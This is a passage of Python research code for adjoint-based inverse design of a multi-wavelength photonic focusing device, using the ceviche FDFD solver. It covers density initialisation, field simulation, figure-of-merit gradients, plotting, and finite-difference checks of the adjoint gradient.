self.device_height_voxels % coarsen_factor ) == 0, \"The specified coarsening factor does not evenly divide the device height in voxels!\"\n\n\t\tself.design_width_voxels = int( device_size_voxels[ 0 ] / coarsen_factor )\n\t\tself.design_height_voxels = int( device_size_voxels[ 1 ] / coarsen_factor )\n\n\t\tself.design_density = None\n\n\t\tself.mesh_size_nm = mesh_size_nm\n\t\tself.mesh_size_um = 1e-3 * mesh_size_nm\n\t\tself.mesh_size_m = 1e-9 * mesh_size_nm\n\n\t\tself.device_size_um = [ self.mesh_size_um * device_size_voxels[ idx ] for idx in range( 0, len( device_size_voxels ) ) ]\n\n\t\tself.permittivity_bounds = permittivity_bounds\n\t\tself.min_relative_permittivity = permittivity_bounds[ 0 ]\n\t\tself.max_relative_permittivity = permittivity_bounds[ 1 ]\n\n\t\tself.focal_spots_x_relative = focal_spots_x_relative\n\t\tself.focal_length_y_voxels = focal_length_y_voxels\n\t\tself.wavelengths_um = wavelengths_um\n\t\tself.wavelength_intensity_scaling_factor = 1. / ( eps_nought * np.max( self.wavelengths_um )**2 )\n\t\tself.wavelength_intensity_scaling = self.wavelengths_um**2 * self.wavelength_intensity_scaling_factor\n\n\t\tself.num_wavelengths = len( wavelengths_um )\n\n\t\tself.omega_values = 2 * np.pi * c / ( 1e-6 * wavelengths_um )\n\n\t\tself.wavelength_idx_to_focal_idx = wavelength_idx_to_focal_idx\n\n\t\tself.random_seed = random_seed\n\t\tnp.random.seed( self.random_seed )\n\n\t\tself.density_pairings = density_pairings\n\t\tself.do_density_pairings = not ( self.density_pairings is None )\n\n\t\tassert( self.design_height_voxels % num_layers ) == 0, \"Expected the number of layers to evenly divide the design region\"\n\n\t\tself.num_layers = num_layers\n\t\tself.design_voxels_per_layer = int( self.design_height_voxels / num_layers )\n\n\t\tassert ( len( designable_layer_indicators ) == self.num_layers ), \"The layer designability indicator length does not make sense!\"\n\t\tassert ( len( non_designable_permittivity ) == len( designable_layer_indicators ) ), \"Expected a different length for the non designable permittivity \"\n\n\t\tself.designable_layer_indicators = np.array( designable_layer_indicators )\n\t\tself.non_designable_permittivity = np.array( non_designable_permittivity )\n\t\tself.non_designable_density = ( self.non_designable_permittivity - self.min_relative_permittivity ) / ( self.max_relative_permittivity - self.min_relative_permittivity )\n\n\t\tself.save_folder = save_folder\n\n\t\tself.field_blur = field_blur\n\t\tself.field_blur_size_voxels = field_blur_size_voxels\n\n\t\tself.binarization_set_point = binarization_set_point\n\n\t\tself.setup_simulation()\n\n\tdef init_density_with_random( self, mean_density, sigma_density ):\n\t\tnum_random_values = self.design_width_voxels * self.num_layers\n\n\t\trandom_array_normal_distribution = np.random.normal(\n\t\t\tloc=mean_density,\n\t\t\tscale=sigma_density, size=[ num_random_values ] )\n\n\t\tself.design_density = np.ones( [ self.design_width_voxels, self.design_height_voxels ] )\n\n\t\tfor layer_idx in range( 0, self.num_layers ):\n\t\t\tlayer_start = layer_idx * self.design_voxels_per_layer\n\t\t\tlayer_end = layer_start + self.design_voxels_per_layer\n\n\t\t\trandom_values_start = layer_idx * self.design_width_voxels\n\t\t\trandom_values_end = random_values_start + self.design_width_voxels\n\n\t\t\tfill_data = self.non_designable_density[ layer_idx ] * np.ones( self.design_width_voxels )\n\n\t\t\tif self.designable_layer_indicators[ layer_idx ]:\n\t\t\t\tfill_data = random_array_normal_distribution[ random_values_start : random_values_end ]\n\n\t\t\tfor internal_layer_idx in range( layer_start, layer_end ):\n\t\t\t\tself.design_density[ :, internal_layer_idx ] = fill_data\n\n\t\tself.design_density = np.maximum( 0, np.minimum( self.design_density, 1 ) )\n\n\t\tif self.do_density_pairings:\n\t\t\tself.design_density = self.pair_array( self.design_density )\n\n\tdef init_density_with_uniform( self, density_value ):\n\t\tassert ( ( density_value <= 1.0 ) and ( density_value >= 0.0 ) ), \"Invalid density value specified!\"\n\n\t\tself.design_density = np.ones( [ self.design_width_voxels, self.design_height_voxels ] )\n\n\t\tfor layer_idx in range( 0, self.num_layers ):\n\t\t\tlayer_start = layer_idx * self.design_voxels_per_layer\n\t\t\tlayer_end = layer_start + self.design_voxels_per_layer\n\n\t\t\trandom_values_start = layer_idx * self.design_width_voxels\n\t\t\trandom_values_end = random_values_start + self.design_width_voxels\n\n\t\t\tchoose_density = self.non_designable_density[ layer_idx ]\n\n\t\t\tif self.designable_layer_indicators[ layer_idx ]:\n\t\t\t\tchoose_density = density_value\n\n\t\t\tfor internal_layer_idx in range( layer_start, layer_end ):\n\t\t\t\tself.design_density[ :, internal_layer_idx ] = choose_density\n\n\tdef init_density_directly( self, input_density ):\n\t\tassert ( ( input_density.shape[ 0 ] == self.design_width_voxels ) and ( input_density.shape[ 1 ] == self.design_height_voxels ) ), \"Specified design has the wrong shape\"\n\n\t\tself.design_density = input_density.copy()\n\n\tdef init_density_with_this_class( self, this_class ):\n\t\tself.init_density_directly( this_class.design_density )\n\n\tdef setup_simulation( self ):\n\t\tself.width_gap_voxels = int( 1.0 * np.max( self.wavelengths_um ) / self.mesh_size_um )\n\t\tself.height_gap_voxels_top = int( 1.5 * np.max( self.wavelengths_um ) / self.mesh_size_um )\n\t\tself.height_gap_voxels_bottom = self.width_gap_voxels\n\t\tself.pml_voxels = int( 1.0 * np.max( self.wavelengths_um ) / self.mesh_size_um )\n\n\t\tself.simulation_width_voxels = self.device_width_voxels + 2 * self.width_gap_voxels + 2 * self.pml_voxels\n\t\tself.simulation_height_voxels = self.device_height_voxels + np.maximum( self.focal_length_y_voxels, 0 ) + self.height_gap_voxels_bottom + self.height_gap_voxels_top + 2 * self.pml_voxels\n\n\t\tself.device_width_start = int( 0.5 * ( self.simulation_width_voxels - self.device_width_voxels ) )\n\t\tself.device_width_end = self.device_width_start + self.device_width_voxels\n\t\tself.device_height_start = int( self.pml_voxels + self.height_gap_voxels_bottom + np.maximum( self.focal_length_y_voxels, 0 ) )\n\t\tself.device_height_end = self.device_height_start + self.device_height_voxels\n\n\t\tself.focal_spots_x_voxels = [\n\t\t\tint( self.device_width_start + self.focal_spots_x_relative[ idx ] * self.device_width_voxels ) for idx in range( 0, len( self.focal_spots_x_relative ) )\n\t\t]\n\n\t\tself.fwd_src_y = int( self.pml_voxels + self.height_gap_voxels_bottom + np.maximum( self.focal_length_y_voxels, 0 ) + self.device_height_voxels + 0.75 * self.height_gap_voxels_top )\n\t\tself.focal_point_y = int( self.pml_voxels + self.height_gap_voxels_bottom - np.minimum( self.focal_length_y_voxels, 0 ) )\n\n\t\tself.rel_eps_simulation = np.ones( ( self.simulation_width_voxels, self.simulation_height_voxels ), dtype=np.complex )\n\n\t\tfwd_src_x_range = np.arange( 0, self.simulation_width_voxels )\n\t\tfwd_src_y_range = self.fwd_src_y * np.ones( fwd_src_x_range.shape, dtype=int )\n\n\t\tself.fwd_source = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ), dtype=np.complex )\n\t\tself.fwd_source[ fwd_src_x_range, fwd_src_y_range ] = 1\n\n\tdef plot_geometry( self, opt_mask=None ):\n\t\timport matplotlib.pyplot as plt\n\n\t\tfocal_y = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ) )\n\t\tfor spot in range( 0, len( self.focal_spots_x_voxels ) ):\n\t\t\tfocal_y[\n\t\t\t\tself.focal_spots_x_voxels[ spot ] - 5 : self.focal_spots_x_voxels[ spot ] + 5,\n\t\t\t\tself.focal_point_y - 5 : self.focal_point_y + 5 ] = 1\n\n\t\tdevice_region = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ) )\n\t\tdevice_region[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = 1\n\n\t\tfor spot in range( 0, len( self.focal_spots_x_voxels ) ):\n\t\t\tdevice_region[\n\t\t\t\tself.focal_spots_x_voxels[ spot ] - 5 : self.focal_spots_x_voxels[ spot ] + 5,\n\t\t\t\tself.focal_point_y - 5 : self.focal_point_y + 5 ] = 2\n\n\n\t\tplt.subplot( 2, 2, 1 )\n\t\tplt.imshow( np.real( self.fwd_source ) )\n\t\tplt.title( 'Forward Source' )\n\t\tplt.subplot( 2, 2, 2 )\n\t\tplt.imshow( focal_y )\n\t\tplt.title( 'Focal Y' )\n\t\tplt.subplot( 2, 2, 3 )\n\t\tplt.imshow( device_region )\n\t\tplt.title( 'Device Region' )\n\t\tif opt_mask is not None:\n\t\t\topt_mask_region = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ) )\n\t\t\tupsampled_mask = upsample( opt_mask, self.coarsen_factor )\n\n\t\t\tfor row in range( 0, upsampled_mask.shape[ 0 ] ):\n\t\t\t\tfor col in range( 0, upsampled_mask.shape[ 1 ] ):\n\t\t\t\t\topt_mask_region[ self.device_width_start + row, self.device_height_start + col ] = upsampled_mask[ row, col ]\n\n\t\t\tfor spot in range( 0, len( self.focal_spots_x_voxels ) ):\n\t\t\t\topt_mask_region[\n\t\t\t\t\tself.focal_spots_x_voxels[ spot ] - 5 : self.focal_spots_x_voxels[ spot ] + 5,\n\t\t\t\t\tself.focal_point_y - 5 : self.focal_point_y + 5 ] = 3\n\n\n\t\t\tplt.subplot( 2, 2, 4 )\n\t\t\tplt.imshow( opt_mask_region )\n\t\t\tplt.title( 'Masked optimization region' )\n\t\tplt.show()\n\n\n\n\tdef plot_subcell_gradient_variations( self, omega_idx, factor ):\n\t\timport matplotlib.pyplot as plt\n\t\timport_density = upsample( self.design_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\n\t\tdevice_width_array = np.linspace( 0, 1, self.device_width_voxels )\n\t\tdevice_height_array = np.linspace( 0, 1, self.device_height_voxels )\n\n\t\tinterp_width_array = np.linspace( 0, 1, factor * self.device_width_voxels )\n\t\tinterp_height_array = np.linspace( 0, 1, factor * self.device_height_voxels )\n\n\t\tomega = self.omega_values[ omega_idx ]\n\n\t\tfwd_Ez = self.compute_forward_fields( omega, device_permittivity )\n\t\t\n\t\tfocal_point_x_loc = self.focal_spots_x_voxels[ 0 ]\n\n\t\tinterp_spline_fwd_real = RectBivariateSpline(\n\t\t\tdevice_width_array, device_height_array, np.real( fwd_Ez[\n\t\t\t\tself.device_width_start : self.device_width_end,\n\t\t\t\tself.device_height_start : self.device_height_end\n\t\t] ) )\n\n\t\tinterp_spline_fwd_imag = RectBivariateSpline(\n\t\t\tdevice_width_array, device_height_array, np.imag( fwd_Ez[\n\t\t\t\tself.device_width_start : self.device_width_end,\n\t\t\t\tself.device_height_start : self.device_height_end\n\t\t] ) )\n\n\n\t\tadj_source = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ), dtype=np.complex )\n\t\tadj_source[ focal_point_x_loc, self.focal_point_y ] = np.conj( fwd_Ez[ focal_point_x_loc, self.focal_point_y ] )\n\n\t\tsimulation = ceviche.fdfd_ez( omega, self.mesh_size_m, self.rel_eps_simulation, [ self.pml_voxels, self.pml_voxels ] )\n\t\tadj_Hx, adj_Hy, adj_Ez = simulation.solve( adj_source )\n\n\t\tinterp_spline_adj_real = RectBivariateSpline(\n\t\t\tdevice_width_array, device_height_array, np.real( adj_Ez[\n\t\t\t\tself.device_width_start : self.device_width_end,\n\t\t\t\tself.device_height_start : self.device_height_end\n\t\t] ) )\n\n\t\tinterp_spline_adj_imag = RectBivariateSpline(\n\t\t\tdevice_width_array, device_height_array, np.imag( adj_Ez[\n\t\t\t\tself.device_width_start : self.device_width_end,\n\t\t\t\tself.device_height_start : self.device_height_end\n\t\t] ) )\n\n\n\t\tinterpolated_fwd_real = interp_spline_fwd_real( interp_width_array, interp_height_array )\n\t\tinterpolated_adj_real = interp_spline_adj_real( interp_width_array, interp_height_array )\n\t\tinterpolated_fwd_imag = interp_spline_fwd_imag( interp_width_array, interp_height_array )\n\t\tinterpolated_adj_imag = interp_spline_adj_imag( interp_width_array, interp_height_array )\n\n\t\tinterpolated_fwd = interpolated_fwd_real + 1j * interpolated_fwd_imag\n\t\tinterpolated_adj = interpolated_adj_real + 1j * interpolated_adj_imag\n\n\t\tinterp_grad = 2 * np.real( interpolated_fwd * interpolated_adj )\n\n\t\taveraged_grad = np.zeros( ( self.device_width_voxels, self.device_height_voxels ) )\n\t\tmiddle_grad = 2 * np.real(\n\t\t\tfwd_Ez[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] *\n\t\t\tadj_Ez[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] )\n\n\t\tfor x_idx in range( 0, self.device_width_voxels ):\n\t\t\tfor y_idx in range( 0, self.device_height_voxels ):\n\t\t\t\tfor off_x in range( 0, factor ):\n\t\t\t\t\tstart_x = x_idx * factor\n\t\t\t\t\tfor off_y in range( 0, factor ):\n\t\t\t\t\t\tstart_y = y_idx * factor\n\n\t\t\t\t\t\taveraged_grad[ x_idx, y_idx ] += (\n\t\t\t\t\t\t\t( 1. / ( factor * factor ) ) *\n\t\t\t\t\t\t\tinterp_grad[ start_x + off_x, start_y + off_y ]\n\t\t\t\t\t\t)\n\n\t\tplt.subplot( 1, 3, 1 )\n\t\tplt.imshow( middle_grad, cmap='Blues' )\n\t\tplt.colorbar()\n\t\tplt.subplot( 1, 3, 2 )\n\t\tplt.imshow( averaged_grad, cmap='Blues' )\n\t\tplt.colorbar()\n\t\tplt.subplot( 1, 3, 3 )\n\t\tplt.imshow( ( middle_grad - averaged_grad ), cmap='Greens' )\n\t\tplt.colorbar()\n\t\tplt.show()\n\n\n\n\n\n\t\thalf_width = int( factor * 0.5 * self.device_width_voxels )\n\t\thalf_height = int( factor * 0.5 * self.device_height_voxels )\n\n\t\tplt.subplot( 1, 3, 1 )\n\t\tplt.imshow( np.abs( interpolated_fwd[ half_width : ( half_width + self.coarsen_factor * 2 * factor ), half_height : ( half_height + self.coarsen_factor * 2 * factor) ] ), cmap='Reds' )\n\t\tplt.colorbar()\n\t\tplt.subplot( 1, 3, 2 )\n\t\tplt.imshow( np.abs( interpolated_adj[ half_width : ( half_width + self.coarsen_factor * 2 * factor ), half_height : ( half_height + self.coarsen_factor * 2 * factor) ] ), cmap='Reds' )\n\t\tplt.colorbar()\n\t\tplt.subplot( 1, 3, 3 )\n\t\tplt.imshow(\n\t\t\tnp.real(\n\t\t\t\tinterpolated_fwd[ half_width : ( half_width + self.coarsen_factor * 2 * factor ), half_height : ( half_height + self.coarsen_factor * 2 * factor ) ] *\n\t\t\t\tinterpolated_adj[ half_width : ( half_width + self.coarsen_factor * 2 * factor ), half_height : ( half_height + self.coarsen_factor * 2 * factor ) ] ),\n\t\t\tcmap='Reds' )\n\t\tplt.colorbar()\n\t\tplt.show()\n\n\n\tdef get_device_efields( self, omega_idx ):\n\t\timport matplotlib.pyplot as plt\n\t\timport_density = upsample( self.design_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\t\tself.rel_eps_simulation[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = device_permittivity\n\n\t\tEz = self.compute_forward_fields( self.omega_values[ omega_idx ], device_permittivity )\n\n\t\treturn Ez[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ], device_permittivity\n\n\tdef plot_fields( self, omega_idx ):\n\t\timport matplotlib.pyplot as plt\n\t\timport_density = upsample( self.design_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\t\tself.rel_eps_simulation[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = device_permittivity\n\n\t\tEz = self.compute_forward_fields( self.omega_values[ omega_idx ], device_permittivity )\n\n\t\tplt.subplot( 1, 2, 1 )\n\t\tplt.imshow( np.abs( Ez ), cmap='Blues' )\n\t\tplt.subplot( 1, 2, 2 )\n\t\tplt.imshow( np.real( Ez ), cmap='Greens' )\n\t\tplt.show()\n\n\t\tplt.subplot( 1, 2, 1 )\n\t\tceviche.viz.abs(Ez, outline=self.rel_eps_simulation, ax=plt.gca(), cbar=False)\n\t\tplt.subplot( 1, 2, 2 )\n\t\tplt.imshow( np.flip( np.swapaxes( np.real( self.rel_eps_simulation ), 0, 1 ), axis=0 ), cmap='Greens' )\n\t\tplt.show()\n\n\tdef compute_forward_fields( self, omega, device_permittivity ):\n\t\tself.rel_eps_simulation[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = device_permittivity\n\n\t\tsimulation = ceviche.fdfd_ez( omega, self.mesh_size_m, self.rel_eps_simulation, [ self.pml_voxels, self.pml_voxels ] )\n\t\tfwd_Hx, fwd_Hy, fwd_Ez = simulation.solve( self.fwd_source )\n\n\t\treturn fwd_Ez\n\n\tdef eval_loss( self, omega ):\n\t\tprint( self.max_relative_permittivity )\n\t\tself.rel_eps_simulation[ :, : ] = self.max_relative_permittivity\n\n\t\tsimulation = ceviche.fdfd_ez( omega, self.mesh_size_m, self.rel_eps_simulation, [ self.pml_voxels, self.pml_voxels ] )\n\t\tfwd_Hx, fwd_Hy, fwd_Ez = simulation.solve( self.fwd_source )\n\n\t\treturn fwd_Ez\n\n\tdef compute_fom( self, omega, device_permittivity, focal_point_x_loc, fom_scaling=1.0 ):\n\t\tfwd_Ez = self.compute_forward_fields( omega, device_permittivity )\n\t\tfom = fom_scaling * np.abs( fwd_Ez[ focal_point_x_loc, self.focal_point_y ] )**2\n\t\t\n\t\treturn fom\n\t\n\tdef compute_fom_and_gradient( self, omega, device_permittivity, focal_point_x_loc, fom_scaling=1.0 ):\n\t\tfwd_Ez = self.compute_forward_fields( omega, device_permittivity )\n\t\tfom = fom_scaling * np.abs( fwd_Ez[ focal_point_x_loc, self.focal_point_y ] )**2\n\t\t\n\t\tadj_source = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ), dtype=np.complex )\n\t\tadj_source[ focal_point_x_loc, self.focal_point_y ] = np.conj( fwd_Ez[ focal_point_x_loc, self.focal_point_y ] )\n\n\t\tsimulation = ceviche.fdfd_ez( omega, self.mesh_size_m, self.rel_eps_simulation, [ self.pml_voxels, self.pml_voxels ] )\n\t\tadj_Hx, adj_Hy, adj_Ez = simulation.solve( adj_source )\n\n\t\tgradient = fom_scaling * 2 * np.real( omega * eps_nought * fwd_Ez * adj_Ez / 1j )\n\n\t\treturn fom, gradient\n\n\tdef compute_fom_and_gradient_and_fields( self, omega, device_permittivity, focal_point_x_loc, fom_scaling=1.0 ):\n\t\tfwd_Ez = self.compute_forward_fields( omega, device_permittivity )\n\t\tfom = fom_scaling * np.abs( fwd_Ez[ focal_point_x_loc, self.focal_point_y ] )**2\n\t\t\n\t\tadj_source = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ), dtype=np.complex )\n\t\tadj_source[ focal_point_x_loc, self.focal_point_y ] = np.conj( fwd_Ez[ focal_point_x_loc, self.focal_point_y ] )\n\n\t\tsimulation = ceviche.fdfd_ez( omega, self.mesh_size_m, self.rel_eps_simulation, [ self.pml_voxels, self.pml_voxels ] )\n\t\tadj_Hx, adj_Hy, adj_Ez = simulation.solve( adj_source )\n\n\t\tgradient = fom_scaling * 2 * np.real( omega * eps_nought * fwd_Ez * adj_Ez / 1j )\n\n\t\treturn fom, gradient, fwd_Ez\n\n\tdef compute_net_fom_from_density( self, input_density ):\n\t\tfom_by_wl = []\n\n\t\timport_density = upsample( input_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\n\t\tfor wl_idx in range( 0, self.num_wavelengths ):\n\t\t\tget_focal_point_idx = self.wavelength_idx_to_focal_idx[ wl_idx ]\n\t\t\tget_fom = self.compute_fom(\n\t\t\t\tself.omega_values[ wl_idx ], device_permittivity,\n\t\t\t\tself.focal_spots_x_voxels[ get_focal_point_idx ], self.wavelength_intensity_scaling[ wl_idx ] )\n\t\t\tfom_by_wl.append( get_fom )\n\n\t\tnet_fom = np.product( fom_by_wl )\n\n\t\treturn net_fom\n\n\t# CODE DUPLICATION! FIX\n\tdef compute_net_fom( self ):\n\t\treturn self.compute_net_fom_from_density( self.design_density )\n\n\tdef verify_adjoint_against_finite_difference_lambda_design_line( self, save_loc ):\n\t\t# get_density = upsample( self.design_density, self.coarsen_factor )\n\t\t# get_permittivity = self.density_to_permittivity( get_density )\n\t\tnp.random.seed( 23123 )\n\n\t\t# random_density = upsample( np.random.random( ( int( self.device_width_voxels / 4 ), int( self.device_height_voxels / 4 ) ) ), 4 )\n\t\t# random_perm = self.density_to_permittivity( random_density )\n\n\t\t# random_density = np.random.random( ( self.design_width_voxels, self.design_height_voxels ) )\n\t\trandom_density = 0.5 * np.ones( ( self.design_width_voxels, self.design_height_voxels ) )\n\t\trandom_density = upsample( random_density, self.coarsen_factor )\n\t\trandom_perm = self.density_to_permittivity( random_density )\n\n\n\t\tfd_focal_x_loc = self.focal_spots_x_voxels[ 0 ]\n\t\tfd_grad = np.zeros( self.design_density.shape )\n\t\tfd_grad_second = np.zeros( self.design_density.shape )\n\t\t# fom_init, adj_grad, adj_grad_orig, save_p_ind, save_p_ind2, save_p_ind3 = self.compute_fom_and_gradient_with_polarizability(\n\t\t# \tself.omega_values[ 0 ], random_perm, fd_focal_x_loc )\n\t\tfom_init, adj_grad = self.compute_fom_and_gradient(\n\t\t\tself.omega_values[ 0 ], random_perm, fd_focal_x_loc )\n\n\t\tadj_grad = adj_grad[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ]\n\t\tadj_grad = ( self.coarsen_factor )**2 * reinterpolate_average( adj_grad, self.coarsen_factor )\n\n\t\tchoose_row = int( 0.5 * self.design_width_voxels )\n\t\tchoose_col = int( 0.5 * self.design_height_voxels )\n\n\t\th_min = -0.05\n\t\th_max = 0.05\n\t\tnum_h = 201\n\n\t\th_values = np.linspace( h_min, h_max, num_h )\n\n\t\tfom_line = np.zeros( num_h )\n\t\tfom_line = np.zeros( num_h )\n\n\t\tfor h_idx in range( 0, num_h ):\n\t\t\tcopy_perm = random_perm.copy()\n\t\t\tcopy_perm[\n\t\t\t\tchoose_row * self.coarsen_factor : ( choose_row + 1 ) * self.coarsen_factor,\n\t\t\t\tchoose_col * self.coarsen_factor : ( choose_col + 1 ) * self.coarsen_factor ] += h_values[ h_idx ]\n\t\t\t# copy_perm[\n\t\t\t# \tchoose_row * self.coarsen_factor,\n\t\t\t# \tchoose_col * self.coarsen_factor ] += h_values[ h_idx ]\n\n\t\t\tfd_permittivity = copy_perm.copy()\n\n\t\t\tfom_line[ h_idx ] = self.compute_fom( self.omega_values[ 0 ], fd_permittivity, fd_focal_x_loc )\t\t\t\n\n\t\tnp.save( save_loc + \"_h_values.npy\", h_values )\n\t\tnp.save( save_loc + \"_fd_line.npy\", fom_line )\n\t\tnp.save( save_loc + \"_adj_grad.npy\", adj_grad )\n\t\t# np.save( save_loc + \"_adj_grad_orig.npy\", adj_grad_orig )\n\n\n\tdef verify_adjoint_against_finite_difference_lambda_design_anisotropic( self, save_loc ):\n\t\t# get_density = upsample( self.design_density, self.coarsen_factor )\n\t\t# get_permittivity = self.density_to_permittivity( get_density )\n\t\tnp.random.seed( 23123 )\n\n\t\trandom_density = upsample( np.random.random( ( int( self.device_width_voxels / 4 ), int( self.device_height_voxels / 4 ) ) ), 4 )\n\t\trandom_perm = self.density_to_permittivity( random_density )\n\n\t\t# random_density = np.random.random( ( self.design_width_voxels, self.design_height_voxels ) )\n\t\t# random_density = 0.5 * np.ones( ( self.design_width_voxels, self.design_height_voxels ) )\n\t\t# random_density = upsample( random_density, self.coarsen_factor )\n\t\t# random_perm = self.density_to_permittivity( random_density )\n\t\n\t\tfd_focal_x_loc = self.focal_spots_x_voxels[ 0 ]\n\t\tfd_grad = np.zeros( self.design_density.shape )\n\t\tfd_grad_second = np.zeros( self.design_density.shape )\n\t\tfom_init, adj_grad, adj_grad_orig, save_p_ind, save_p_ind2, save_p_ind3 = self.compute_fom_and_gradient_with_polarizability(\n\t\t\tself.omega_values[ 0 ], random_perm, fd_focal_x_loc )\n\n\t\th = 1e-3 / ( self.coarsen_factor**2 )\n\n\t\tfor row in range( 0, self.design_width_voxels ):\n\t\t\tfor col in range( 0, self.design_height_voxels ):\n\t\t\t\t# copy_density = random_density.copy()\n\t\t\t\tcopy_perm = random_perm.copy()\n\n\t\t\t\tcopy_perm[ row * self.coarsen_factor : (row + 1) * self.coarsen_factor, col * self.coarsen_factor : ( col + 1 ) * self.coarsen_factor ] += h\n\n\t\t\t\t# copy_density[ row, col ] += ( h / ( self.max_relative_permittivity - self.min_relative_permittivity ) )\n\t\t\t\t# fd_density = upsample( copy_density, self.coarsen_factor )\n\t\t\t\tfd_permittivity = copy_perm.copy()#self.density_to_permittivity( fd_density )\n\n\t\t\t\tfom_up = self.compute_fom( self.omega_values[ 0 ], fd_permittivity, fd_focal_x_loc )\t\t\t\n\n\n\n\n\t\t\t\tcopy_perm = random_perm.copy()\n\n\t\t\t\tcopy_perm[ row * self.coarsen_factor : (row + 1) * self.coarsen_factor, col * self.coarsen_factor : ( col + 1 ) * self.coarsen_factor ] -= h\n\n\t\t\t\t# copy_density[ row, col ] += ( h / ( self.max_relative_permittivity - self.min_relative_permittivity ) )\n\t\t\t\t# fd_density = upsample( copy_density, self.coarsen_factor )\n\t\t\t\tfd_permittivity = copy_perm#self.density_to_permittivity( fd_density )\n\n\n\t\t\t\t# copy_density = random_density.copy()\n\t\t\t\t# copy_density[ row, col ] -= ( h / ( self.max_relative_permittivity - self.min_relative_permittivity ) )\n\t\t\t\t# fd_density = upsample( copy_density, self.coarsen_factor )\n\t\t\t\tfd_permittivity = copy_perm.copy()#self.density_to_permittivity( fd_density )\n\n\t\t\t\tfom_down = self.compute_fom( self.omega_values[ 0 ], fd_permittivity, fd_focal_x_loc )\n\n\t\t\t\tfd_grad[ row, col ] = ( fom_up - fom_down ) / ( 2 * h )\n\n\t\t\t\tfd_grad_second[ row, col ] = ( fom_up + fom_down - 2 * fom_init ) / ( h**2 )\n\n\n\t\tnp.save( save_loc + \"_fd_grad.npy\", fd_grad )\n\t\tnp.save( save_loc + \"_fd_grad_second.npy\", fd_grad_second )\n\t\tnp.save( save_loc + \"_adj_grad.npy\", adj_grad )\n\t\tnp.save( save_loc + \"_adj_grad_orig.npy\", adj_grad_orig )\n\n\n\n\tdef verify_adjoint_against_finite_difference( self ):\n\t\tfd_x = int( 0.5 * self.device_width_voxels )\n\t\tfd_x = int( self.coarsen_factor * 3 )\n\t\tfd_y = np.arange( 0, self.device_height_voxels )\n\t\tcompute_fd_density = np.zeros( len( fd_y ) )\n\t\tcompute_fd_real = np.zeros( len( fd_y ) )\n\t\tcompute_fd_imag = np.zeros( len( fd_y ) )\n\t\tomega_idx = int( 0.5 * len( self.omega_values ) )\n\t\tfd_omega = self.omega_values[ omega_idx ]\n\n\t\t# fd_init_device = 1.5 * np.ones( ( self.device_width_voxels, self.device_height_voxels ) )\n\t\timport_density = upsample( self.design_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\t\tfd_init_device = device_permittivity\n\n\t\tfocal_point_x = self.focal_spots_x_voxels[ 0 ]\n\n\t\tget_fom, get_grad_real, get_grad_imag = self.compute_fom_and_gradient_real_imag(\n\t\t\tfd_omega, fd_init_device, focal_point_x )\n\n\t\tget_grad_real = get_grad_real[\n\t\t\tself.device_width_start : self.device_width_end,\n\t\t\tself.device_height_start : self.device_height_end ]\n\t\tget_grad_imag = get_grad_imag[\n\t\t\tself.device_width_start : self.device_width_end,\n\t\t\tself.device_height_start : self.device_height_end ]\n\n\t\tinterpolate_grad_real = reinterpolate_average( get_grad_real, self.coarsen_factor )\n\t\tinterpolate_grad_imag = reinterpolate_average( get_grad_imag, self.coarsen_factor )\n\n\t\tget_grad_density = (\n\t\t\tnp.real( self.max_relative_permittivity - self.min_relative_permittivity ) * interpolate_grad_real +\n\t\t\tnp.imag( self.max_relative_permittivity - self.min_relative_permittivity ) * interpolate_grad_imag );\n\n\t\tfd_x_density = int( fd_x / self.coarsen_factor )\n\n\t\tfd_step_eps = 1e-6\n\t\tfd_step_rho = 1e-6\n\n\t\tnum = 10\n\n\t\tfor fd_y_idx in range( 0, num ):\n\t\t\tprint( \"working on \" + str( fd_y_idx ) )\n\t\t\tfd_design = self.design_density.copy()\n\t\t\tfd_design[ fd_x_density, fd_y[ fd_y_idx ] ] += fd_step_rho\n\n\t\t\timport_fd_density = upsample( fd_design, self.coarsen_factor )\n\t\t\tdevice_fd_permittivity = self.density_to_permittivity( import_fd_density )\n\n\t\t\tget_fom_step_density = self.compute_fom( fd_omega, device_fd_permittivity, focal_point_x )\n\n\n\t\t\tcompute_fd_density[ fd_y_idx ] = ( get_fom_step_density - get_fom ) / fd_step_eps\n\n\t\t\tfd_device_permittivity = fd_init_device.copy()\n\t\t\tfd_device_permittivity[ fd_x, fd_y[ fd_y_idx ] ] += fd_step_eps\n\t\t\tget_fom_step_real = self.compute_fom( fd_omega, fd_device_permittivity, focal_point_x )\n\n\t\t\tfd_device_permittivity = fd_init_device.copy()\n\t\t\tfd_device_permittivity[ fd_x, fd_y[ fd_y_idx ] ] += 1j * fd_step_eps\n\n\t\t\tget_fom_step_imag = self.compute_fom( fd_omega, fd_device_permittivity, focal_point_x )\n\n\t\t\tcompute_fd_real[ fd_y_idx ] = ( get_fom_step_real - get_fom ) / fd_step_eps\n\t\t\tcompute_fd_imag[ fd_y_idx ] = ( get_fom_step_imag - get_fom ) / fd_step_eps\n\n\t\timport matplotlib.pyplot as plt\n\t\tplt.subplot( 1, 3, 1 )\n\t\tplt.plot( get_grad_real[ fd_x, 0 : num ], color='g', linewidth=2 )\n\t\tplt.plot( compute_fd_real[ 0 : num ], color='r', linewidth=2, linestyle='--' )\n\t\tplt.subplot( 1, 3, 2 )\n\t\tplt.plot( get_grad_imag[ fd_x, 0 : num ], color='g', linewidth=2 )\n\t\tplt.plot( 